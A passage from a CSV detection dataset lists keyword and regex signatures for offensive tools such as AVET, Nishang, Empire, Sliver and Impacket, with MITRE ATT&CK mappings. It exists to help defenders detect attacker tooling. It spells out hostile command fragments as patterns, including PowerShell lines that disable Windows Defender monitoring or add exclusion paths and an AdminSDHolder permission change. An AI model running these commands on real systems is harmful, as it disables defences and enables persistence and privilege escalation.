TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion get_num_processes*",".{0,1000}add_evasion\sget_num_processes.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion get_standard_browser *",".{0,1000}add_evasion\sget_standard_browser\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion get_tickcount*",".{0,1000}add_evasion\sget_tickcount.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion gethostbyname_sandbox_evasion*",".{0,1000}add_evasion\sgethostbyname_sandbox_evasion.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_background_wp*",".{0,1000}add_evasion\shas_background_wp.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_folder *",".{0,1000}add_evasion\shas_folder\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_network_drive*",".{0,1000}add_evasion\shas_network_drive.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_public_desktop*",".{0,1000}add_evasion\shas_public_desktop.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_recent_files*",".{0,1000}add_evasion\shas_recent_files.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_recycle_bin*",".{0,1000}add_evasion\shas_recycle_bin.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_username *",".{0,1000}add_evasion\shas_username\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_vm_mac*",".{0,1000}add_evasion\shas_vm_mac.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion has_vm_regkey*",".{0,1000}add_evasion\shas_vm_regkey.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion hide_console*",".{0,1000}add_evasion\shide_console.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion interaction_getchar*",".{0,1000}add_evasion\sinteraction_getchar.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion interaction_system_pause*",".{0,1000}add_evasion\sinteraction_system_pause.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion is_debugger_present*",".{0,1000}add_evasion\sis_debugger_present.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*add_evasion sleep_by_ping *",".{0,1000}add_evasion\ssleep_by_ping\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*Add_Privilege /Process:* /Privilege:*",".{0,1000}Add_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*add_random_newlines(obfuscated_code*",".{0,1000}add_random_newlines\(obfuscated_code.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005?","N/A","N/A","Defense Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","8","1","60","11","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z" "*add0626b999fe41981a9f6fbf0e5ee1bc51e4677397e8b8c69cc7a2d36571a4c*",".{0,1000}add0626b999fe41981a9f6fbf0e5ee1bc51e4677397e8b8c69cc7a2d36571a4c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*adda6c0cbcc22357d88157922fafad38cc732fd71fa1389181dc1b31c7f6428e*",".{0,1000}adda6c0cbcc22357d88157922fafad38cc732fd71fa1389181dc1b31c7f6428e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*addcomputer.py -computer-name * -computer-pass * -dc-host * -domain-netbios *",".{0,1000}addcomputer\.py\s\-computer\-name\s.{0,1000}\s\-computer\-pass\s.{0,1000}\s\-dc\-host\s.{0,1000}\s\-domain\-netbios\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*addcomputer.py -delete -computer-name * -dc-host * -domain-netbios *",".{0,1000}addcomputer\.py\s\-delete\s\-computer\-name\s.{0,1000}\s\-dc\-host\s.{0,1000}\s\-domain\-netbios\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*addcomputer.py*",".{0,1000}addcomputer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Add-ConstrainedDelegationBackdoor*",".{0,1000}Add\-ConstrainedDelegationBackdoor.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Add-Exfiltration.ps1*",".{0,1000}Add\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Adding GlobaLeaks PGP key to trusted APT keys*",".{0,1000}Adding\sGlobaLeaks\sPGP\skey\sto\strusted\sAPT\skeys.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*Add-KeePassConfigTrigger*",".{0,1000}Add\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*AddKeePassTrigger.ps1*",".{0,1000}AddKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*AddKeePassTrigger.ps1*",".{0,1000}AddKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Add-MpPreference -DisableBehaviorMonitoring True*",".{0,1000}Add\-MpPreference\s\-DisableBehaviorMonitoring\sTrue.{0,1000}","offensive_tool_keyword","powershell","Windows defender disable protection","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Add-MpPreference -DisableBehaviourMonitoring True*",".{0,1000}Add\-MpPreference\s\-DisableBehaviourMonitoring\sTrue.{0,1000}","offensive_tool_keyword","powershell","Windows defender disable protection","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Add-MpPreference -DisDisableRealtimeMonitoring True*",".{0,1000}Add\-MpPreference\s\-DisDisableRealtimeMonitoring\sTrue.{0,1000}","offensive_tool_keyword","powershell","Windows defender disable protection","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Add-MpPreference -ExclusionPath *",".{0,1000}Add\-MpPreference\s\-ExclusionPath\s.{0,1000}","offensive_tool_keyword","powershell","Windows Defender evasion add an exclusion directory for your shady stuff","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Add-MpPreference -ExclustionPath c:\users\public*",".{0,1000}Add\-MpPreference\s\-ExclustionPath\sc\:\\users\\public.{0,1000}","offensive_tool_keyword","powershell","Windows Defender evasion add an exclusion directory for your shady stuff","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder*CN=System' -PrincipalSamAccountName * -Rights All*",".{0,1000}Add\-ObjectAcl\s\-TargetADSprefix\s\'CN\=AdminSDHolder.{0,1000}CN\=System\'\s\-PrincipalSamAccountName\s.{0,1000}\s\-Rights\sAll.{0,1000}","offensive_tool_keyword","powerview","modifying existing permissions on an Active Directory object ('AdminSDHolder'). which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and modifying its permissions may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/zloeber/PSAD/blob/master/src/inprogress/Add-ObjectACL.ps1","1","0","N/A","N/A","1","15","2","2017-10-26T20:35:53Z","2017-07-07T13:34:07Z" "*Add-Persistence *",".{0,1000}Add\-Persistence\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Add-Persistence*",".{0,1000}Add\-Persistence.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Add-Persistence.ps1*",".{0,1000}Add\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Add-Persistence.ps1*",".{0,1000}Add\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*addPreloadToPrivesc*",".{0,1000}addPreloadToPrivesc.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*addpriv SeloadDrivePrivilege*",".{0,1000}addpriv\sSeloadDrivePrivilege.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Add-PSFirewallRules*",".{0,1000}Add\-PSFirewallRules.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ADDR ?= 127.0.0.1:4444*",".{0,1000}ADDR\s\?\=\s127\.0\.0\.1\:4444.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*Add-RegBackdoor.ps1*",".{0,1000}Add\-RegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Add-RegBackdoor.ps1*",".{0,1000}Add\-RegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Add-RemoteRegBackdoor*",".{0,1000}Add\-RemoteRegBackdoor.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Using DAMP toolkit We add the backdoor using the Add-RemoteRegBackdoor.ps1 cmdlet from DAMP.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Add-RemoteRegBackdoor*",".{0,1000}Add\-RemoteRegBackdoor.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*Add-RemoteRegBackdoor.json*",".{0,1000}Add\-RemoteRegBackdoor\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*addresshunter.h*",".{0,1000}addresshunter\.h.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Add-ScrnSaveBackdoor.ps1*",".{0,1000}Add\-ScrnSaveBackdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 